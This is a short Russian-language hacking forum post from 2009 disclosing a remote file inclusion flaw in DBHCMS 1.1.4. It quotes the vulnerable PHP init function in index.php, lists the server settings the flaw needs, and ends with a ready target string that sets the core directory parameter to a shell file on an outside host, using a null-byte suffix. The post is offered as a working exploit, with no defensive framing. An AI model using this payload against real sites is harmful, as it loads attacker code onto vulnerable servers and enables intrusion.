09.12.2009, 16:04
|
|
Он хакер.
Регистрация: 01.11.2008
Сообщений: 1,756
Провел на форуме:
6462214
Репутация:
3171
|
|
Product: DBHCMS - Web Content Management System
Author: http://www.drbenhur.com/
Version: 1.1.4
RFI
/*Необходимо register_globals = ON and allow_url_include = ON без второго юзаеться как LFI*/
file: index.php
PHP код:
function dbhcms_init($core) {
$init = $core.'init.php';
$page = $core.'page.php';
if ((is_file($init))&&(is_file($page))) {
require_once($init);
require_once($page);
} else {
die('<div style="color: #872626; font-weight: bold;">
FATAL ERROR - Could not find the initialzation files.
Please check the "$dbhcms_core_dir" parameter in the "config.php" and make
shure the directory is correct.
</div>');
}
}
......
dbhcms_init($GLOBALS['dbhcms_core_dir']);
target: ?dbhcms_core_dir=http://site.com/shell.txt%00
|
|
|